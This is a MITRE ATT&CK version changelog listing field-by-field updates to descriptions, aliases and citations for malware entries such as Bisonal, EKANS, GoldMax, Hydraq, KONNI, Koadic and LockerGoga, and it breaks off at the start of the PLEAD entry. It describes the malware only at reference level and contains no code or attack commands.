external_references{'source_name': 'Symantec Dragonfly', 'description': 'Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.', 'url': 'https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments'}

[S0268] Bisonal

Current version: 2.0

Version changed from: 1.2 → 2.0


Old Description
New Description
t1[Bisonal](https://attack.mitre.org/software/S0268) is malwart1[Bisonal](https://attack.mitre.org/software/S0268) is a remo
>e that has been used in attacks against targets in Russia, S>te access tool (RAT) that has been used by [Tonto Team](http
>outh Korea, and Japan. It has been observed in the wild sinc>s://attack.mitre.org/groups/G0131) against public and privat
>e 2014.(Citation: Unit 42 Bisonal July 2018)>e sector organizations in Russia, South Korea, and Japan sin
 >ce at least December 2010.(Citation: Unit 42 Bisonal July 20
 >18)(Citation: Talos Bisonal Mar 2020)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 16:05:26.618000+00:002022-04-18 17:18:36.512000+00:00
description[Bisonal](https://attack.mitre.org/software/S0268) is malware that has been used in attacks against targets in Russia, South Korea, and Japan. It has been observed in the wild since 2014.(Citation: Unit 42 Bisonal July 2018)[Bisonal](https://attack.mitre.org/software/S0268) is a remote access tool (RAT) that has been used by [Tonto Team](https://attack.mitre.org/groups/G0131) against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020)
external_references[1]['description'](Citation: Unit 42 Bisonal July 2018)(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020)
x_mitre_version1.22.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Talos Bisonal Mar 2020', 'description': 'Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022.', 'url': 'https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html'}

[S0605] EKANS

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1[EKANS](https://attack.mitre.org/software/S0605) is ransomwat1[EKANS](https://attack.mitre.org/software/S0605) is ransomwa
>re variant that first appeared in mid-December 2019. [EKANS]>re variant written in Golang that first appeared in mid-Dece
>(https://attack.mitre.org/software/S0605) is distinct from o>mber 2019 and has been used against multiple sectors, includ
>ther ransomware as it was written in Golang and aims to stop>ing energy, healthcare, and automotive manufacturing, which 
> services and processes related to Industrial Control System>in some cases resulted in significant operational disruption
>s.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS>s. [EKANS](https://attack.mitre.org/software/S0605) has used
>)> a hard-coded kill-list of processes, including some associa
 >ted with common ICS software platforms (e.g., GE Proficy, Ho
 >neywell HMIWeb, etc), similar to those defined in [MegaCorte
 >x](https://attack.mitre.org/software/S0576).(Citation: Drago
 >s EKANS)(Citation: Palo Alto Unit 42 EKANS)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-13 21:54:51.532000+00:002022-05-11 14:00:00.188000+00:00
description[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant that first appeared in mid-December 2019. [EKANS](https://attack.mitre.org/software/S0605) is distinct from other ransomware as it was written in Golang and aims to stop services and processes related to Industrial Control Systems.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)
external_references[4]['description']Hinchliffe, A. Santos, D.. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.
x_mitre_version1.02.0

[S0588] GoldMax

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1[GoldMax](https://attack.mitre.org/software/S0588) is a secot1[GoldMax](https://attack.mitre.org/software/S0588) is a seco
>nd-stage C2 backdoor written in Go that was used by [APT29](>nd-stage C2 backdoor written in Go with Windows and Linux va
>https://attack.mitre.org/groups/G0016) and discovered in ear>riants that are nearly identical in functionality. [GoldMax]
>ly 2021 during the investigation into breaches related to th>(https://attack.mitre.org/software/S0588) was discovered in 
>e SolarWinds intrusion. [GoldMax](https://attack.mitre.org/s>early 2021 during the investigation into the SolarWinds intr
>oftware/S0588) uses multiple defense evasion techniques, inc>usion, and has likely been used by [APT29](https://attack.mi
>luding avoiding virtualization execution and masking malicio>tre.org/groups/G0016) since at least mid-2019. [GoldMax](htt
>us traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: Fir>ps://attack.mitre.org/software/S0588) uses multiple defense 
>eEye SUNSHUTTLE Mar 2021)>evasion techniques, including avoiding virtualization execut
 >ion and masking malicious traffic.(Citation: MSTIC NOBELIUM 
 >Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: C
 >rowdStrike StellarParticle January 2022)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 22:52:42.023000+00:002022-04-15 22:23:36.883000+00:00
description[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go that was used by [APT29](https://attack.mitre.org/groups/G0016) and discovered in early 2021 during the investigation into breaches related to the SolarWinds intrusion. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the SolarWinds intrusion, and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)
external_references[1]['source_name']GoldMaxSUNSHUTTLE
external_references[1]['description'](Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)
external_references[2]['source_name']SUNSHUTTLEGoldMax
external_references[2]['description'](Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: MSTIC NOBELIUM Mar 2021)
external_references[3]['source_name']MSTIC NOBELIUM Mar 2021CrowdStrike StellarParticle January 2022
external_references[3]['description']Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.
external_references[3]['url']https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/
external_references[4]['source_name']FireEye SUNSHUTTLE Mar 2021MSTIC NOBELIUM Mar 2021
external_references[4]['description']Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021.Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.htmlhttps://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEye SUNSHUTTLE Mar 2021', 'description': 'Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021.', 'url': 'https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html'}
x_mitre_platformsLinux

[S0203] Hydraq

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[Hydraq](https://attack.mitre.org/software/S0203) is a data-t1[Hydraq](https://attack.mitre.org/software/S0203) is a data-
>theft trojan first used by [Elderwood](https://attack.mitre.>theft trojan first used by [Elderwood](https://attack.mitre.
>org/groups/G0066) in the 2009 Google intrusion known as Oper>org/groups/G0066) in the 2009 Google intrusion known as Oper
>ation Aurora, though variations of this trojan have been use>ation Aurora, though variations of this trojan have been use
>d in more recent campaigns by other Chinese actors, possibly>d in more recent campaigns by other Chinese actors, possibly
> including [APT17](https://attack.mitre.org/groups/G0025). (> including [APT17](https://attack.mitre.org/groups/G0025).(C
>Citation: MicroFocus 9002 Aug 2016) (Citation: Symantec Elde>itation: MicroFocus 9002 Aug 2016)(Citation: Symantec Elderw
>rwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010)>ood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)(Ci
> (Citation: ASERT Seven Pointed Dagger Aug 2015) (Citation: >tation: ASERT Seven Pointed Dagger Aug 2015)(Citation: FireE
>FireEye DeputyDog 9002 November 2013) (Citation: ProofPoint >ye DeputyDog 9002 November 2013)(Citation: ProofPoint GoT 90
>GoT 9002 Aug 2017) (Citation: FireEye Sunshop Campaign May 2>02 Aug 2017)(Citation: FireEye Sunshop Campaign May 2013)(Ci
>013) (Citation: PaloAlto 3102 Sept 2015)>tation: PaloAlto 3102 Sept 2015)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ
external_referenceshttps://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf
external_referenceshttps://www.symantec.com/connect/blogs/trojanhydraq-incident
external_referenceshttps://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf
external_referenceshttps://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html
external_referenceshttps://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures
external_referenceshttps://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html
values_changed
STIX FieldOld valueNew Value
modified2021-01-06 19:32:28.374000+00:002022-04-15 14:57:44.182000+00:00
description[Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025). (Citation: MicroFocus 9002 Aug 2016) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) (Citation: ASERT Seven Pointed Dagger Aug 2015) (Citation: FireEye DeputyDog 9002 November 2013) (Citation: ProofPoint GoT 9002 Aug 2017) (Citation: FireEye Sunshop Campaign May 2013) (Citation: PaloAlto 3102 Sept 2015)[Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025).(Citation: MicroFocus 9002 Aug 2016)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: ASERT Seven Pointed Dagger Aug 2015)(Citation: FireEye DeputyDog 9002 November 2013)(Citation: ProofPoint GoT 9002 Aug 2017)(Citation: FireEye Sunshop Campaign May 2013)(Citation: PaloAlto 3102 Sept 2015)
external_references[1]['source_name']Hydraq9002 RAT
external_references[1]['description'](Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: MicroFocus 9002 Aug 2016)
external_references[2]['source_name']AuroraRoarur
external_references[2]['description'](Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Novetta-Axiom)
external_references[3]['source_name']9002 RATMdmBot
external_references[3]['description'](Citation: MicroFocus 9002 Aug 2016)(Citation: Novetta-Axiom)
external_references[4]['source_name']MicroFocus 9002 Aug 2016HomeUnix
external_references[4]['description']Petrovsky, O. (2016, August 30). “9002 RAT” -- a second building on the left. Retrieved February 20, 2018.(Citation: Novetta-Axiom)
external_references[5]['source_name']Symantec Elderwood Sept 2012Homux
external_references[5]['description']O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.(Citation: Novetta-Axiom)
external_references[6]['source_name']Symantec Trojan.Hydraq Jan 2010HidraQ
external_references[6]['description']Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.(Citation: Novetta-Axiom)
external_references[7]['source_name']ASERT Seven Pointed Dagger Aug 2015HydraQ
external_references[7]['description']ASERT. (2015, August). ASERT Threat Intelligence Report – Uncovering the Seven Pointed Dagger. Retrieved March 19, 2018.(Citation: Novetta-Axiom)
external_references[8]['source_name']FireEye DeputyDog 9002 November 2013McRat
external_references[8]['description']Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved March 19, 2018.(Citation: Novetta-Axiom)
external_references[9]['source_name']ProofPoint GoT 9002 Aug 2017Hydraq
external_references[9]['description']Huss, D. & Mesa, M. (2017, August 25). Operation RAT Cook: Chinese APT actors use fake Game of Thrones leaks as lures. Retrieved March 19, 2018.(Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010)
external_references[10]['source_name']FireEye Sunshop Campaign May 2013Aurora
external_references[10]['description']Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved March 19, 2018.(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)
external_references[11]['source_name']PaloAlto 3102 Sept 2015ASERT Seven Pointed Dagger Aug 2015
external_references[11]['description']Falcone, R. & Miller-Osborn, J. (2015, September 23). Chinese Actors Use ‘3102’ Malware in Attacks on US Government and EU Media. Retrieved March 19, 2018.ASERT. (2015, August). ASERT Threat Intelligence Report – Uncovering the Seven Pointed Dagger. Retrieved March 19, 2018.
external_references[11]['url']https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'PaloAlto 3102 Sept 2015', 'description': 'Falcone, R. & Miller-Osborn, J. (2015, September 23). Chinese Actors Use ‘3102’ Malware in Attacks on US Government and EU Media. Retrieved March 19, 2018.', 'url': 'https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/'}
external_references{'source_name': 'ProofPoint GoT 9002 Aug 2017', 'description': 'Huss, D. & Mesa, M. (2017, August 25). Operation RAT Cook: Chinese APT actors use fake Game of Thrones leaks as lures. Retrieved March 19, 2018.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures'}
external_references{'source_name': 'FireEye Sunshop Campaign May 2013', 'description': 'Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved March 19, 2018.', 'url': 'https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html'}
external_references{'source_name': 'FireEye DeputyDog 9002 November 2013', 'description': 'Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved March 19, 2018.', 'url': 'https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html'}
external_references{'source_name': 'Novetta-Axiom', 'description': 'Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.', 'url': 'http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf'}
external_references{'source_name': 'Symantec Elderwood Sept 2012', 'description': "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", 'url': 'https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf'}
external_references{'source_name': 'MicroFocus 9002 Aug 2016', 'description': 'Petrovsky, O. (2016, August 30). “9002 RAT” -- a second building on the left. Retrieved February 20, 2018.', 'url': 'https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ'}
external_references{'source_name': 'Symantec Trojan.Hydraq Jan 2010', 'description': 'Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.', 'url': 'https://www.symantec.com/connect/blogs/trojanhydraq-incident'}
x_mitre_aliasesRoarur
x_mitre_aliasesMdmBot
x_mitre_aliasesHomeUnix
x_mitre_aliasesHomux
x_mitre_aliasesHidraQ
x_mitre_aliasesHydraQ
x_mitre_aliasesMcRat

[S0356] KONNI

Current version: 2.0

Version changed from: 1.4 → 2.0


Old Description
New Description
t1[KONNI](https://attack.mitre.org/software/S0356) is a Windowt1[KONNI](https://attack.mitre.org/software/S0356) is a remote
>s remote administration too that has been seen in use since > access tool that security researchers assess has been used 
>2014 and evolved in its capabilities through at least 2017. >by North Korean cyber actors since at least 2014. [KONNI](ht
>[KONNI](https://attack.mitre.org/software/S0356) has been li>tps://attack.mitre.org/software/S0356) has significant code 
>nked to several campaigns involving North Korean themes.(Cit>overlap with the [NOKKI](https://attack.mitre.org/software/S
>ation: Talos Konni May 2017) [KONNI](https://attack.mitre.or>0353) malware family, and has been linked to several suspect
>g/software/S0356) has significant code overlap with the [NOK>ed North Korean campaigns targeting political organizations 
>KI](https://attack.mitre.org/software/S0353) malware family.>in Russia, East Asia, Europe and the Middle East; there is s
> There is some evidence potentially linking [KONNI](https://>ome evidence potentially linking [KONNI](https://attack.mitr
>attack.mitre.org/software/S0356) to [APT37](https://attack.m>e.org/software/S0356) to [APT37](https://attack.mitre.org/gr
>itre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(C>oups/G0067).(Citation: Talos Konni May 2017)(Citation: Unit 
>itation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan >42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citati
>2020)>on: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 
 >2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-08-03 19:32:54.607000+00:002022-04-13 17:26:25.143000+00:00
description[KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)[KONNI](https://attack.mitre.org/software/S0356) is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Talos Konni May 2017)(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)
external_references[1]['description'](Citation: Talos Konni May 2017)(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021)
external_references[2]['source_name']Talos Konni May 2017Unit 42 Nokki Oct 2018
external_references[2]['description']Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.
external_references[2]['url']https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.htmlhttps://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/
external_references[4]['source_name']Unit 42 Nokki Oct 2018Medium KONNI Jan 2020
external_references[4]['description']Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020.
external_references[4]['url']https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
external_references[5]['source_name']Medium KONNI Jan 2020Talos Konni May 2017
external_references[5]['description']Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020.Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.
external_references[5]['url']https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9bhttps://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html
x_mitre_version1.42.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Malwarebytes Konni Aug 2021', 'description': 'Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022.', 'url': 'https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/'}

[S0250] Koadic

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[Koadic](https://attack.mitre.org/software/S0250) is a Windot1[Koadic](https://attack.mitre.org/software/S0250) is a Windo
>ws post-exploitation framework and penetration testing tool.>ws post-exploitation framework and penetration testing tool 
> [Koadic](https://attack.mitre.org/software/S0250) is public>that is publicly available on GitHub. [Koadic](https://attac
>ly available on GitHub and the tool is executed via the comm>k.mitre.org/software/S0250) has several options for staging 
>and-line. [Koadic](https://attack.mitre.org/software/S0250) >payloads and creating implants, and performs most of its ope
>has several options for staging payloads and creating implan>rations using Windows Script Host.(Citation: Github Koadic)(
>ts. [Koadic](https://attack.mitre.org/software/S0250) perfor>Citation: Palo Alto Sofacy 06-2018)(Citation: MalwareBytes L
>ms most of its operations using Windows Script Host. (Citati>azyScripter Feb 2021)
>on: Github Koadic) (Citation: Palo Alto Sofacy 06-2018) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:55:29.911000+00:002022-04-06 19:32:33.511000+00:00
description[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool. [Koadic](https://attack.mitre.org/software/S0250) is publicly available on GitHub and the tool is executed via the command-line. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants. [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host. (Citation: Github Koadic) (Citation: Palo Alto Sofacy 06-2018)[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.(Citation: Github Koadic)(Citation: Palo Alto Sofacy 06-2018)(Citation: MalwareBytes LazyScripter Feb 2021)
external_references[1]['description'](Citation: Github Koadic)(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)
external_references[2]['source_name']Github KoadicMalwareBytes LazyScripter Feb 2021
external_references[2]['description']Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021.
external_references[2]['url']https://github.com/zerosum0x0/koadichttps://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Github Koadic', 'description': 'Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.', 'url': 'https://github.com/zerosum0x0/koadic'}

[S0372] LockerGoga

Current version: 2.0

Version changed from: 1.3 → 2.0


Old Description
New Description
t1[LockerGoga](https://attack.mitre.org/software/S0372) is rant1[LockerGoga](https://attack.mitre.org/software/S0372) is ran
>somware that has been tied to various attacks on European co>somware that was first reported in January 2019, and has bee
>mpanies. It was first reported upon in January 2019.(Citatio>n tied to various attacks on European companies, including i
>n: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga >ndustrial and manufacturing firms.(Citation: Unit42 LockerGo
>2019)>ga 2019)(Citation: CarbonBlack LockerGoga 2019)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Joe Slowik - Dragos']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 18:56:22.049000+00:002022-05-23 21:22:58.477000+00:00
description[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that has been tied to various attacks on European companies. It was first reported upon in January 2019.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)
external_references[1]['source_name']Unit42 LockerGoga 2019CarbonBlack LockerGoga 2019
external_references[1]['description']Harbison, M.. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019.
external_references[1]['url']https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/
external_references[2]['source_name']CarbonBlack LockerGoga 2019Unit42 LockerGoga 2019
external_references[2]['description']CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019.Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.
external_references[2]['url']https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
x_mitre_version1.32.0

[S0435] PLEAD

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1[PLEAD](https://attack.mitre.org/software/S0435) is a remotet1[PLEAD](https://attack.mitre.org/software/S0435) is a remote
> access tool (RAT) and downloader used by [BlackTech](https:> access tool (RAT) and downloader used by [BlackTech](https:
